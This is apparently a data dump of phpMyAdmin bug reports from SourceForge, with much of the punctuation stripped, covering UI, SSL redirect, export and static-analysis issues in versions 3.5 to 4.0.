When i log out and log in, the tab appears again Google chrome lists the below errors Refused to load the style chrome extension cpngackimfmofbokmjmljamhdncknpmg style.css because it violates the following Content Security Policy directive default src self unsafe inline .
Refused to load the script chrome extension cpngackimfmofbokmjmljamhdncknpmg page context.js because it violates the following Content Security Policy directive script src self unsafe inline unsafe eval http www.phpmyadmin.net .
[blocked] The page at https XXXXXX mysql main.php?token=7e6e6a990806a4ab44cc18c142e6b4fe ran insecure content from http www.phpmyadmin.net home page version.js?
=1347309971256.
Original URL https sourceforge.net p phpmyadmin bugs 3677 Original author anonymous Found in version 3.5.1","bug"
"24444","10070","Does not display or manipulate bit 64) fields appropriately.
I have a table containing a bit 64) field, that does not display correctly in the 3.5.2.2 version of phpMyAdmin.
Previous versions 2.11.10) show the correct data in the field.
In the latest version, we get a jumble of 1 s and 0 s, but not in the proper places.
Editing the field also produces an error of 0 rows affected.
Warning 1264 Out of range value for column task type at row 1 .
PHP PHP 5.3.2 1ubuntu4.14 with Suhosin Patch cli) built Feb 11 2012 06 35 39) MySQL Distrib 5.1.63, for debian linux gnu x86 64) using readline 6.1 Browser Firefox 15.0.1 OS Ubuntu 10.04.4 Here is the text from Create Table, and the task type field is the one not functioning properly CREATE TABLE `Task` `tid` int 32) unsigned NOT NULL AUTO INCREMENT, `requestor type` enum Lifecycle , LifecycleVM , Source , SourceVM , Master , External ) NOT NULL DEFAULT External , `requestor` int 32) unsigned NOT NULL DEFAULT 0 , `task type` bit 64) NOT NULL, `execute` timestamp NOT NULL DEFAULT CURRENT TIMESTAMP, `recur` smallint 5) unsigned NOT NULL DEFAULT 0 , `target id` int 32) unsigned NOT NULL DEFAULT 0 , `arg1` varchar 4096) DEFAULT NULL, `arg2` varchar 4096) DEFAULT NULL, `arg3` varchar 4096) DEFAULT NULL, `arg4` varchar 4096) DEFAULT NULL, `arg5` varchar 4096) DEFAULT NULL, `arg6` varchar 4096) DEFAULT NULL, `arg7` varchar 4096) DEFAULT NULL, `arg8` varchar 4096) DEFAULT NULL, `arg9` varchar 4096) DEFAULT NULL, `arg10` varchar 4096) DEFAULT NULL, `status` enum Queued , DequeuePending , Rejected , Accepted , ExecutionPending , InProgress , Error , Complete , Cancelled ) NOT NULL DEFAULT Queued , `status msg` varchar 1024) DEFAULT NULL, `result` varchar 4096) DEFAULT NULL, PRIMARY KEY `tid`), KEY `task bm` `task type`), KEY `status` `status`) ) ENGINE=MyISAM AUTO INCREMENT=247 DEFAULT CHARSET=latin1 Original URL https sourceforge.net p phpmyadmin bugs 3678 Original author jgleicher Found in version 3.5.4","bug"
"24444","10071","Pasting value doesn t clear null checkbox.
I click browse on same table.
Then I click on some table to edit it s value.
If column can be null and I paste there some value using ctrl v, it doesn t clear the null checkbox.
When I hit Enter, null value is saved instead of pasted value.
Original URL https sourceforge.net p phpmyadmin bugs 3679 Original author freeman3 Found in version 3.5.2","bug"
"24444","10072","Server status page Monitor problems.
Hi, i m having problems with Monitor section in Server status page 1.)
Our phpmyadmin installation is not allowed to access proc filesystem using PHP open basedir) which is causing huge problems to phpmyadmin stability after accessing this page access it and then try to open any table 2.)
If i allow access to proc, it is revealing lots of system information to any user which i don t like, should be configurable 3.)
It is showing incorrect information anyway because we are using phpmyadmin to access several different servers and Monitor is showing only local server Original URL https sourceforge.net p phpmyadmin bugs 3680 Original author azurit Found in version 3.5.2","bug"
"24444","10073","Git commit links to Github missing.
On the main page phpMyAdmin box, the links to Github pages are missing.
Original URL https sourceforge.net p phpmyadmin bugs 3899 Original author mynetx Found in version 4.0.0","bug"
"24444","10074","routine parameter headers not valid for function.
when using the add routine feature, the headers for the parameter options need to change when switching from procedure to function.
i think that just the direction header needs to go away since that isn t valid for functions.
Original URL https sourceforge.net p phpmyadmin bugs 3681 Original author q7joey Found in version 3.5.2","bug"
"24444","10075","uuid short ) is a no arguments function.
In the insertion tab i select uuid short.
however in the sql code i see that MPA is adding quotes inside the function as in uuid short ) causing the insert to fail.
version 3.5.2.2.
Original URL https sourceforge.net p phpmyadmin bugs 3682 Original author ferdna Found in version 3.5.3","bug"
"24444","10076","Incorrect listing of records from to count.
Viser poster 500 499 11 total, forepxc3xb8rgsel tog 0.0017 sek) SELECT FROM `kundeprodaktive` WHERE `nr` =1394 ORDER BY `kundeprodaktive`.`produkt` ASC LIMIT 500 Clearly it should have been 0 10 and not 500 499 Original URL https sourceforge.net p phpmyadmin bugs 3683 Original author joergent Found in version 3.5.5","bug"
"24444","10077","Datepicker for date and datetime fields is broken.
The datepicker for editing the value of date and datetime fields is broken.
When you click on the next month previous month arrow, the first time it works correctly, but starting from the second time, it only updates the contents of the textfield without redrawing the calendar.
Original URL https sourceforge.net p phpmyadmin bugs 3684 Original author sistisette Found in version 3.5.2","bug"
"24444","10078","Username with more than 16 digits are cut without warning.. phpmyadmin 3.2.2 I entered a random username by copying.
It had 20 digits.
Then i copied the 30 digits password too.
Then the problem started.
I couldnt log in.
After searching i found that my username isnt like i stored it but instead its cut after the 16th letter.
And that happened without warning.
So i searched for the error.
Its simply not userfriendly.
When there is such restriction then there should be a warning.
Thanks!
Sebastian Original URL https sourceforge.net p phpmyadmin bugs 3686 Original author sebastian333 Found in version 3.5.2","bug"
"24444","10079","Can not use LIKE statement for date fields.
When using DATE or DATETIME fields in the tbl select.php the Search option), it is impossible to enter values like in the search field.
This renders the usage of LIKE kinda useless ; ).
I confirmed that this has to do with the jQuery datepicker that is being used.
When I disable the timepicker script, I can use these values again.
Original URL https sourceforge.net p phpmyadmin bugs 3688 Original author frikkeboom Found in version 3.5.2","bug"
"24444","10080","Static Analysis Results Undefined variables, function parameter problems.
I ran the latest git master branch through hhvm hphp t analyze and filtered out most of the false positives.
I only checked a few of these, but the ones I checked appear to be valid issues File libraries plugins export ExportOdt.class.php 350 Reason UseUndeclaredVariable Snippet table Line .
htmlspecialchars table) .
data > ; File libraries plugins import ImportShp.class.php 97 Reason UseUndeclaredVariable Snippet import file Line PMA getNoOfFilesInZip import file) > 1 File libraries plugins import ImportShp.class.php 96 Reason UseUndeclaredVariable Snippet compression Line if compression == application zip File libraries plugins import ImportShp.class.php 99 Reason UseUndeclaredVariable Snippet import file Line zip content = PMA getZipContents import file, .
\.shp i ); File libraries plugins import ImportShp.class.php 108 Reason UseUndeclaredVariable Snippet compression Line if compression == application zip File libraries plugins import ImportShp.class.php 109 Reason UseUndeclaredVariable Snippet cfg Line !
empty cfg[ TempDir ]) File libraries plugins import ImportShp.class.php 110 Reason UseUndeclaredVariable Snippet cfg Line is writable cfg[ TempDir ]) File libraries plugins import ImportShp.class.php 113 Reason UseUndeclaredVariable Snippet import file Line .
\.dbf i , import file File libraries plugins import ImportShp.class.php 119 Reason UseUndeclaredVariable Snippet import file Line import file, File libraries plugins import ImportShp.class.php 120 Reason UseUndeclaredVariable Snippet cfg Line realpath cfg[ TempDir ]), File libraries plugins import ImportShp.class.php 124 Reason UseUndeclaredVariable Snippet cfg Line dbf file path = realpath cfg[ TempDir ]) File libraries plugins import ImportShp.class.php 135 Reason UseUndeclaredVariable Snippet local import file Line } elseif !
empty local import file) File libraries plugins import ImportShp.class.php 136 Reason UseUndeclaredVariable Snippet cfg Line !
empty cfg[ UploadDir ]) File libraries plugins import ImportShp.class.php 137 Reason UseUndeclaredVariable Snippet compression Line compression == none File libraries plugins import ImportShp.class.php 143 Reason UseUndeclaredVariable Snippet import file Line file name = substr import file, 0, strlen import file) 4) File libraries plugins import ImportShp.class.php 143 Reason UseUndeclaredVariable Snippet import file Line file name = substr import file, 0, strlen import file) 4) File libraries plugins import ImportShp.class.php 162 Reason UseUndeclaredVariable Snippet dbf file path Line unlink dbf file path); File libraries plugins import ImportCsv.class.php 163 Reason UseUndeclaredVariable Snippet err url Line PMA Util mysqlDie message >getMessage ), , , err url); File libraries plugins import ImportCsv.class.php 170 Reason UseUndeclaredVariable Snippet csv replace Line if isset csv replace)) { File libraries plugins import ImportCsv.class.php 174 Reason UseUndeclaredVariable Snippet csv ignore Line if isset csv ignore)) { File libraries plugins import ImportCsv.class.php 182 Reason UseUndeclaredVariable Snippet csv columns Line if empty csv columns)) { File libraries plugins import ImportCsv.class.php 187 Reason UseUndeclaredVariable Snippet csv columns Line tmp = preg split , ?)
, csv columns); File libraries replication gui.lib.php 368 Reason UseUndeclaredVariable Snippet mode Line if isset GLOBALS[ username ]) mode != change ) { File libraries sql query form.lib.php 457 Reason UseUndeclaredVariable Snippet timeout passed Line isset timeout passed) timeout passed isset local import file)) File libraries sql query form.lib.php 457 Reason UseUndeclaredVariable Snippet timeout passed Line isset timeout passed) timeout passed isset local import file)) File libraries sql query form.lib.php 457 Reason UseUndeclaredVariable Snippet local import file Line isset timeout passed) timeout passed isset local import file)) File libraries sql query form.lib.php 458 Reason UseUndeclaredVariable Snippet local import file Line ?
local import file File libraries transformations.lib.php 382 Reason UseUndeclaredVariable Snippet cfgRelation Line if !
isset cfgRelation[ column info ])) { File server status.php 197 Reason UseUndeclaredVariable Snippet hour factor Line ServerStatusData >status[ Bytes received ] hour factor, 3, 1 File server status.php 216 Reason UseUndeclaredVariable Snippet hour factor Line ServerStatusData >status[ Bytes sent ] hour factor, 3, 1 File server status.php 236 Reason UseUndeclaredVariable Snippet hour factor Line hour factor, 3, 1 File server status.php 283 Reason UseUndeclaredVariable Snippet hour factor Line ServerStatusData >status[ Aborted connects ] hour factor, 4, 2, true File server status.php 307 Reason UseUndeclaredVariable Snippet hour factor Line ServerStatusData >status[ Aborted clients ] hour factor, 4, 2, true File server status.php 331 Reason UseUndeclaredVariable Snippet hour factor Line ServerStatusData >status[ Connections ] hour factor, 4, 2 File server status queries.php 154 Reason UseUndeclaredVariable Snippet hour factor Line PMA Util formatNumber value hour factor, 4, 1, true) File libraries plugins import ImportLdi.class.php 123 Reason UseUndeclaredVariable Snippet ldi ignore Line } elseif isset ldi ignore)) { File libraries rte rte export.lib.php 45 Reason UseUndeclaredVariable Snippet response Line response = PMA message error response); File libraries sql.lib.php 426 Reason UseUndeclaredVariable Snippet cfg Line cfg[ ForeignKeyMaxLimit ] File libraries config ConfigFile.class.php 241 Reason UseUndeclaredVariable Snippet current global Line || empty current global))) File libraries dbi mysqli.dbi.lib.php 391 Reason UseUndeclaredVariable Snippet link Line if empty link)) { File libraries plugins export ExportHtmlword.class.php 132 Reason UseUndeclaredVariable Snippet charsetOfFile Line .
isset charsetOfFile) ?
charsetOfFile utf 8 ) .
> File libraries plugins export ExportHtmlword.class.php 132 Reason UseUndeclaredVariable Snippet charsetOfFile Line .
isset charsetOfFile) ?
charsetOfFile utf 8 ) .
> File libraries plugins export ExportHtmlword.class.php 293 Reason UseUndeclaredVariable Snippet table Line keys = PMA DBI getTableIndexes db, table); File libraries tcpdf tcpdf.php 5200 Reason UseUndeclaredVariable Snippet type Line if isset type)) { File libraries tcpdf tcpdf.php 5203 Reason UseUndeclaredVariable Snippet cw Line if isset cw)) { File libraries DisplayResults.class.php 2987 Reason UseUndeclaredVariable Snippet edit url Line if isset edit url)) { File libraries DisplayResults.class.php 2990 Reason UseUndeclaredVariable Snippet edit url Line edit url, File libraries DisplayResults.class.php 3401 Reason UseUndeclaredVariable Snippet row Line sql query => KILL .
row[0], FIXME variable row is undefined File libraries DisplayResults.class.php 3407 Reason UseUndeclaredVariable Snippet row Line js conf = KILL .
row[0]; FIXME variable row is undefined File libraries DisplayResults.class.php 3406 Reason UseUndeclaredVariable Snippet row Line del query = KILL .
row[0]; FIXME variable row is undefined File libraries DisplayResults.class.php 5222 Reason UseUndeclaredVariable Snippet printview Line !
isset printview) File libraries DisplayResults.class.php 5852 Reason TooManyArgument Snippet this > getCheckboxForMultiRowSubmissions del url, is display, row no, where clause html, condition array, del query, id suffix = left , , , ) Line ret .= this > getCheckboxForMultiRowSubmissions File libraries DisplayResults.class.php 5869 Reason TooManyArgument Snippet this > getDeleteLink del url, del str, js conf, , ) Line ret .= this > getDeleteLink del url, del str, js conf, , ); File libraries DisplayResults.class.php 5886 Reason TooManyArgument Snippet this > getCheckboxForMultiRowSubmissions del url, is display, row no, where clause html, condition array, del query, id suffix = left , , , ) Line ret .= this > getCheckboxForMultiRowSubmissions File libraries DisplayResults.class.php 5857 Reason TooManyArgument Snippet this > getEditLink edit url, class, edit str, where clause, where clause html, ) Line ret .= this > getEditLink File libraries DisplayResults.class.php 5865 Reason TooManyArgument Snippet this > getDeleteLink del url, del str, js conf, , ) Line ret .= this > getDeleteLink del url, del str, js conf, , ); File libraries DisplayResults.class.php 5875 Reason TooManyArgument Snippet this > getEditLink edit url, class, edit str, where clause, where clause html, ) Line ret .= this > getEditLink File libraries DisplayResults.class.php 5879 Reason TooManyArgument Snippet this > getCheckboxForMultiRowSubmissions del url, is display, row no, where clause html, condition array, del query, id suffix = right , , , ) Line ret .= this > getCheckboxForMultiRowSubmissions File libraries TableSearch.class.php 484 Reason UseUndeclaredVariable Snippet types Line geom funcs = PMA Util getGISFunctions types, true, false); File libraries dbi dummy.lib.php 420 Reason UseUndeclaredVariable Snippet i Line GLOBALS[ dummy queries ][ i][ pos ] = offset; File libraries dbi dummy.lib.php 417 Reason UseUndeclaredVariable Snippet i Line if offset > count GLOBALS[ dummy queries ][ i][ result ])) { File libraries operations.lib.php 1513 Reason UseUndeclaredVariable Snippet auto increment Line !
isset auto increment) File libraries operations.lib.php 1514 Reason UseUndeclaredVariable Snippet auto increment Line || REQUEST[ new auto increment ] !== auto increment) File libraries schema Visio Relation Schema.class.php 260 Reason UseUndeclaredVariable Snippet fontSize Line this > setHeightTable fontSize); File server replication.php 297 Reason UseVoidReturn Snippet PMA replication print status table slave , true, false) Line echo PMA replication print status table slave , true, false); File libraries sqlvalidator.class.php 385 Reason TooFewArgument Snippet this > openSession this >service link, this >username, this >password, this >calling program, this >calling program version, this >target dbms, this >target dbms version, this >connection technology, this >connection technology version) Line this >session data = this > openSession File libraries DBQbe.class.php 1238 Reason TooManyArgument Snippet this > getWhereClauseTablesAndColumns this > criteria) Line valid where clauses = this > getWhereClauseTablesAndColumns this > criteria); File libraries php gettext gettext.inc 458 Reason TooManyArgument Snippet npgettext context, singular, plural, number) Line return npgettext context, singular, plural, number); File libraries php gettext gettext.inc 465 Reason TooManyArgument Snippet dnpgettext domain, context, singular, plural, number) Line return dnpgettext domain, context, singular, plural, number); File libraries php gettext gettext.inc 474 Reason TooManyArgument Snippet dcnpgettext domain, context, singular, plural, number, category) Line return dcnpgettext domain, context, singular, File libraries php gettext gettext.inc 517 Reason TooManyArgument Snippet npgettext context, singular, plural, number) Line return npgettext context, singular, plural, number); File libraries php gettext gettext.inc 523 Reason TooManyArgument Snippet dnpgettext domain, context, singular, plural, number) Line return dnpgettext domain, context, singular, plural, number); File libraries php gettext gettext.inc 530 Reason TooManyArgument Snippet dcnpgettext domain, context, singular, plural, number, category) Line return dcnpgettext domain, context, singular, plural, File server status advisor.php 20 Reason TooManyArgument Snippet new PMA ServerStatusData server status advisor.php ) Line ServerStatusData = new PMA ServerStatusData server status advisor.php ); File server status monitor.php 293 Reason TooManyArgument Snippet implode , PMA Util formatByteDown strlen row[ argument ])), 2, 2) Line .
implode File changelog.php 14 Reason UseVoidReturn Snippet PMA Response getInstance ) >disable ) Line response = PMA Response getInstance ) >disable ); File index.php 211 Reason UseVoidReturn Snippet PMA printListItem PMA Util getImage b tblops.png ) .
.
More settings ), li user preferences , prefs manage.php?
.
common url query, null, null, null, no bullets ) Line echo PMA printListItem Original URL https sourceforge.net p phpmyadmin bugs 3907 Original author rasmus Found in version Latest Git","bug"
"24444","10081","Calendar widget improperly redirects to home.
In Insert mode, when editing a date, clicking the right arrow button to increase the month), PMA jumps to the homepage.
Original URL https sourceforge.net p phpmyadmin bugs 3908 Original author paour1 Found in version 4.0.0","bug"
"24444","10082","Blank page after big file upload.
I try to import a 13MB zipped SQL file yes, I have incremented upload max filesize and post max size, and the correct value is displayed in the import page).
Immediately after the upload is done, I get a BLANK PAGE the navigation column on the left is displayed but the right part of the page is blank).
There are a lot of good reasons why the import may fail, but what is absolutely wrong and is a phpmyadmin bug is the fact that you only see a blank page.
An informative error message should be shown or the import should work).
This is certainly NOT because of the max execution time limit, as the blank page is shown IMMEDIATELY after the file has finished uploading, so not even a few seconds of actual php execution times have elapsed when the blank page is shown.
Of course, the import fails meaning the DBs are not created).
Original URL https sourceforge.net p phpmyadmin bugs 3690 Original author sistisette Found in version 3.3.7","bug"
"24444","10083","various search operators not working as expected.
the 4 operators in the search interface that don t need a value is null, is not null, = , != ) don t actually work unless you put something in the value box.
it doesn t seem to matter what is put there, even whitespace works.
probably just a slight logic bug that is checking for a value before looking at the operator.
Original URL https sourceforge.net p phpmyadmin bugs 3691 Original author q7joey Found in version 3.5.3","bug"
"24444","10084","ForceSSL redirects to 80.
Same as 3510196 marked as fixed) FreeBSD9.0 phpMyAdmin 3.5.3 Original URL https sourceforge.net p phpmyadmin bugs 3692 Original author anonymous Found in version 3.5.3","bug"
"24444","10085","Invalid SELECT statement when enum field present.
A table has the following fields among others) nr int 6) kundetype enum normal , reseller ) utf8 bin When searching for a record using the search window and using the primary key nr only, the following statement was generated SELECT FROM `kunder` WHERE `nr` = 415 AND `kundetype` = null It should have been SELECT FROM `kunder` WHERE `nr` = 415 Original URL https sourceforge.net p phpmyadmin bugs 3693 Original author joergent Found in version 3.5.3","bug"
"24444","10086","Grid editing shows the value before silent trunc..
I have a field in my table that is of SMALLINT type.
If I edit in place that column and enter a decimal value, the data gets truncated when it gets inserted into the table as expected), but the field shows the original decimal value.
e.g.
I have my SMALLINT field, I enter 500.987 and hit enter.
It runs for a second, then shows 500.987 as being the field value when the actual field value on refresh), shows 501 as expected).
Original URL https sourceforge.net p phpmyadmin bugs 3694 Original author benjamwelker Found in version 3.5.3","bug"
"24444","10087","pma tracking table doesn t update.
I m trying to monitor changes every type) on some table of my DB, but it seems that the tracking system can t recognize update on the changed and monitored tables.
pma tracking table always shows records with creation and last update equal.
Original URL https sourceforge.net p phpmyadmin bugs 3695 Original author davidepaltri","bug"
"24444","10088","PMA DBI store result defined only for mysqli.
Only mysqli DBI defines PMA DBI store result function, which is used in few places in the code.
Either it s usage should be replaced by other DBI methods or it needs to be implemented for mysql and drizzle backends as well.
Original URL https sourceforge.net p phpmyadmin bugs 3696 Original author nijel Found in version Latest Git","bug"
"24444","10089","Browse foreign values does not show on ajax edit.
Go to a database table and click the Edit icon.
It takes you to a separate page where you can edit the row.
If you have set up relationships in PMA the foreign key thing for MyISAM) it displays a link to the right of the fields to browse foreign values .
However, on the table view if you tick several rows and click the Edit icon at the bottom of the page, it pops up with the quick edit modal window but the icon to browse foreign values is not there!
Although if there are only a few foreign values, it does show the lt;select gt; element.
I honestly have no idea why it shows here and not for the other situation.
Logically, a quick edit would be the exact opposite, showing for a single field but not for multiple.
Regardless, have some consistency and use the modal boxes for everything.
Original URL https sourceforge.net p phpmyadmin bugs 3697 Original author svivian Found in version 3.5.3","bug"
"24444","10090","Cannot edit foreign values using inline editing.
Go to a table that uses PMA s relationship feature the foreign key thing for MyISAM).
Click a cell to try and edit it.
You can t just type a number in the box, all you can do is click to browse foreign values and select one.
Sometimes you know the actual value and just want to type it!
Original URL https sourceforge.net p phpmyadmin bugs 3698 Original author svivian Found in version 3.5.3","bug"
"24444","10091","Incorrect imagejpeg Syntax Breaks Image Transf..
In newer versions of PHP, due to incorrect syntax for the imagejpeg function in transformation wrapper.php, image resizing breaks outputs no image data).
The line that reads ImageJPEG destImage, , 75); Should be ImageJPEG destImage, NULL, 75); as per the documentation at http php.net manual en function.imagejpeg.php .
The current way works fine on my server with PHP 5.3.8, but not on my server with PHP 5.4.6, but I m not sure on the exact version cutoff.
Original URL https sourceforge.net p phpmyadmin bugs 3699 Original author mister magotchi Found in version 3.5.3","bug"
"24444","10092","pma tracking table doesn t update.
I m trying to monitor changes every type) on some table of my DB, but it seems that the tracking system can t recognize update on the changed and monitored tables.
pma tracking table always shows records with creation and last update equal.
Original URL https sourceforge.net p phpmyadmin bugs 3700 Original author davidepaltri","bug"
"24444","10093","Not possible to use LIKE on timestamps.
In the search window it is not possible to enter in the search field of a timestamp thus limiting the usage considerably, Searches as LIKE 2012 10 20 20 are not possible Original URL https sourceforge.net p phpmyadmin bugs 3701 Original author joergent Found in version 3.5.3","bug"
"24444","10094","Editing SQL not possible when no records found.
The ability to edit the generated SQL is rather useful, but not possible when using the search window and no results are found.
I do not understand the reasoning for this difference.
There should be no difference.
Original URL https sourceforge.net p phpmyadmin bugs 3702 Original author joergent Found in version 3.5.0","bug"
"24444","10095","Lost space in navigation area.
As reported by Reindl Harald in phpmyadmin users, when using the original theme, there is some extra space between the Recent tables dropdown menu and the list of databases.
Original URL https sourceforge.net p phpmyadmin bugs 3920 Original author ibennetch Found in version 4.0.0","bug"
"24444","10096","Incorrect updating of the list of users.
1\.
Browse to users 2\.
Click to edit a user in the ajax window 3\.
Change user host 4\.
Pick delete the old one from the user tables.
5\.
Save changes 6\.
See the user double in the user table.
Once with old and once with new host.
Refreshing the user list shows only the new version so it s only an ajax display problem.
Version 3.5.3 Original URL https sourceforge.net p phpmyadmin bugs 3703 Original author joolee Found in version 3.3.7","bug"
"24444","10097","SSL redirects to port 80.
It s BACK!
This is bug 3510196 which has reappeared.
I tried 3.5.3 and then the latest repository.
Both contain this bug which was closed by Nijel on a previous build.
So, if Force to SSL is enabled, after login, phpmyadmin redirects to site at port 80 should not, should be just site at regular https port.).
Original URL https sourceforge.net p phpmyadmin bugs 3704 Original author anonymous Found in version Latest Git","bug"
"24444","10098","Attempt to open trigger for edit gives NULL.
I try to open trigger for edit, but when I press button xc2xabeditxc2xbb, window opens with text xc2xabnullxc2xbb.
Trigger s dump CREATE TRIGGER `billing activated services log insert before` BEFORE INSERT ON `billing activated services log` FOR EACH ROW BEGIN IF NEW.`operation` IS NULL OR NEW.`count` lt;= 0 THEN INSERT INTO `error` `error`) VALUES error ); END IF; SET NEW.`time` = UNIX TIMESTAMP NOW )); IF NEW.`action` = add OR NEW.`action` = adm add THEN xd0x9fxd0xb5xd1x80xd0xb5xd0xbfxd0xb8xd1x81xd0xb0xd1x82xd1x8c SET NEW.`service2` = NEW.`service`; xd0x9fxd0xb5xd1x80xd0xb5xd0xbfxd0xb8xd1x81xd0xb0xd1x82xd1x8c INSERT INTO `billing activated services` `subject`, `service`, `count`, `begin`, `end`) VALUES NEW.`subject`, NEW.`service2`, NEW.`count`, NEW.`begin`, NEW.`end`); ELSE IF NEW.`action` = adm delete THEN SET NEW.`service2` = NEW.`service`; DELETE FROM `billing activated services` WHERE `subject` = NEW.`subject` AND `service` = NEW.`service` AND `count` = NEW.`count` AND `begin` = NEW.`begin` AND `end` = NEW.`end` LIMIT 1; IF ROW COUNT ) = 0 THEN INSERT INTO `error` `error`) VALUES error ); END IF; ELSE INSERT INTO `error` `error`) VALUES error ); END IF; END IF; END Original URL https sourceforge.net p phpmyadmin bugs 3705 Original author nnear Found in version 3.5.3","bug"
"24444","10099","Error popup cannot be dismissed.
In grid editing, when a column is linked to a foreign table, you can now either use the Browse foreign values link or type directly the value.
However, let s say that this is a numeric column and you type a letter.
You get a warning popup containing a MySQL message, but it cannot be dismissed.
Original URL https sourceforge.net p phpmyadmin bugs 3706 Original author lem9 Found in version Latest Git","bug"
"24444","10100","Status page no longer works.
Following error appears in php errors.log when clicking the status tab in the latest GIT snapshot.
Call to a member function showMySQLDocu ) on a non object in C \Inetpub\wwwroot\phpMyAdmin\server status.php on line 799 Browser displays Error in processing request Error Code 500 Original URL https sourceforge.net p phpmyadmin bugs 3707 Original author mikemakowski Found in version Latest Git snapshot","bug"
"24444","10101","Notices on database pages.
I believe this has something to do with the sidebar, but I m not certain.
I am getting several notices at the bottom of my pages.
They are all basically the same two notices repeated several times with different backtraces.
The notices are Notice in .\libraries\database interface.lib.php 145 Undefined index file and Notice in .\libraries\database interface.lib.php 146 Undefined index line It also seems that the sidebar does not refresh with the selected databases tables unless this is by design with the new menu look) Original URL https sourceforge.net p phpmyadmin bugs 3708 Original author benjamwelker Found in version Latest Git","bug"
"24444","10102","Error on addfield.
Adding a new field gives this error NetworkError 404 Not Found http ian.umces.edu dbtool tbl addfield.php 20class= Original URL https sourceforge.net p phpmyadmin bugs 3709 Original author adrianbj Found in version Latest Git","bug"
"24444","10103","HTML being injected into export.
I exported a DB to a file could not replicate with the View output as text option), and at the top of the file was the following lt;a class= hide id= update recent tables href= index.php?ajax request=1 amp;amp;recent table=1 amp;amp;token=9810f0248cf8ffb7371e14c9f8bcdce1 gt; lt; a gt; phpMyAdmin SQL Dump version 4.0.0 dev http www.phpmyadmin.net Host localhost Generation Time Nov 01, 2012 at 02 24 PM Server version 5.5.28 PHP Version 5.4.8 Not sure exactly where this lt;a gt; tag is coming from, but there it is.
If you need more info, let me know.
Win 7 64bit 5.5.28 MySQL Community Server GPL) Apache 2.4.3 Win32) VC9 libmysql mysqlnd 5.0.10 20111026 mysqli PHP 5.4.8 Chrome 22.0.1229.94 m Original URL https sourceforge.net p phpmyadmin bugs 3710 Original author benjamwelker Found in version Latest Git snapshot","bug"
"24444","10104","Wrong redirect url caused cookies error ForceSSL.
After enable ForceSSL for ssl support in config.php, the redirect url will AUTOMATIC add an additional slash.
This behaviour lead the cookies error where in pMA, there is always show Cookies must be enabled past this point.
.
I m using CentOS 6.3 with php 5.3.3 with HTTP authenticated method.
Here is a sample of the the output of parse url funtion used in libraries common.inc.php 343 Reproduced steps 1\.
Write a php page with onlu one command lt;?php print r parse url http localhost phpMyAdmin )); ?
gt; 2\.
The output is Array [scheme] = gt; http [host] = gt; localhost [path] = gt; phpMyAdmin ) 3\.
In the libraries common.inc.php, the url will be redirect to http localhost phpMyAdmin where there is an additional in path.
4\.
If not correct the wrong path, there will always show Cookies must be enabled past this point.
in pages.
And there are import.php Missing parameter import typeDocumentation and import.php Missing parameter formatDocumentation erorrs.
5\.
If remove the slash and reload the pages, the notices gone.
NOTICE if using cookie auth method, the ADDITIONAL slashes will show in login page but GONE whtn successful login.
Original URL https sourceforge.net p phpmyadmin bugs 3711 Original author moneycat Found in version 3.5.3","bug"
"24444","10105","IN Clause search does not permit multiple values.
Problems while searching using the in clause.
If there is a dropdown for the search column, it does not change to a test column when we select the IN clause.
Run the below sql to create a simple database and 2 innodb tables create table test.customer id int not null, name varchar 20), primary key id) ) engine innodb; insert into test.customer values 1, foo ), 2, bar ), 3, baz ); create table test.address id int not null, customer id int not null, address varchar 20), primary key id), foreign key customer id) references test.customer id) ) engine innodb; insert into test.address values 1,1, abc ), 2,2, xyz ); Now go to the address table > search for column customer id choose the Operator = IN ..) The value remains a select option it has to change to a textbox option to allow multiple IN clause values Original URL https sourceforge.net p phpmyadmin bugs 3931 Original author naveensnayak Found in version 4.0.0","bug"
"24444","10106","DBG SQL and frames removal.
Since the frames removal merge, I no longer see the output generated by activating cfg[ DBG ][ sql ].
Original URL https sourceforge.net p phpmyadmin bugs 3712 Original author lem9 Found in version Latest Git","bug"
"24444","10107","Do not translate Open Document in export settings.
In the Export settings of phpMyAdmin 4.0.0, the tab title of format specific settings for Open Document files was translated to Dokument xc3xb6ffnen in german); this title should not be translated.
Original URL https sourceforge.net p phpmyadmin bugs 3933 Original author ligh1l Found in version 4.0.1","bug"
"24444","10108","Truncate table does not work.
When trying to truncate a table via the Operations tab gt; Empty the table link, the script takes me to the confirmation page, where I click Yes .
and nothing happens, it just reloads the confirmation page.
Truncating a table via the SQL tab works fine.
Original URL https sourceforge.net p phpmyadmin bugs 3713 Original author benjamwelker Found in version Latest Git","bug"
"24444","10109","setup AJAX is not defined.
setup index.php calls config.js which uses AJAX.registerTeardown ).
This function is defined in js ajax.js which has not been included at this point.
Original URL https sourceforge.net p phpmyadmin bugs 3714 Original author lem9 Found in version Latest Git","bug"
"24444","10110","Multiple broken forms.
Submitting the forms in the replication and qbe features causes a reload of the page.
The confirmations generated by sql.php are also affected related https sourceforge.net tracker ?func=detail aid=3582711 group id=23067 atid=377408) This is mostly due to the fact that the value of the submit buttons are not being sent to the server.
See also http wiki.phpmyadmin.net pma Page loader Expecting the submit button to carry a value Original URL https sourceforge.net p phpmyadmin bugs 3715 Original author roccivic Found in version Latest Git","bug"
"24444","10111","Selecting an action to do after inserting a row does nothing.
Selecting go back to the previous page or insert another row in the drop down menu on the insert into table page makes no effect on the outcome on the request as only the result of the execution of the query is shown after the insert form is submitted.
Original URL https sourceforge.net p phpmyadmin bugs 3716 Original author roccivic Found in version Latest Git","bug"
"24444","10112","After adding a field to a primary key, the table structure view is not updated field not underlined).
Steps to reproduce create a table with at least 3 fields fieldA, fieldB, fieldC create a primary key consisting of fields fieldA and fieldB go to the table structure fieldA and fieldB are shown underlined indicating they are primary key expand the Indexes section in the row showing the primary key, click edit in the overlay that pops up, add the third field fieldC to the primary key save => Observed result The Indexes view shows the updated primary key; however the table view on the top is not updated and still shows only fieldA and fieldB underlined.
What you see onscreen is inconsistent and partially outdated.
=> Expected result the table view should be refreshed accordingly.
Whatever you seen on screen must always be consistent and up to date.
This is an example where the relatively recent everything by popups never reload the page style, which is supposed to be an improvement in usability, has a bug that kills reliability.
Original URL https sourceforge.net p phpmyadmin bugs 3937 Original author sistisette Found in version 3.5.2","bug"
"24444","10113","Query doesn t load in the querywindow.
When attempting to edit a query in the querywindow, the SQL query form is opened in both the main window and the querywindow, however the query displayed in the latter is inccorrect.
The issue is probably coming from js common.js Original URL https sourceforge.net p phpmyadmin bugs 3717 Original author roccivic Found in version Latest Git","bug"
"24444","10114","Inline onsubmit not triggered.
Inline JS code that is embedded in a form tag for the onsubmit event does not get triggered, as the jQuery handler seems to be fired earlier.
This causes some client side form validation to be skipped.
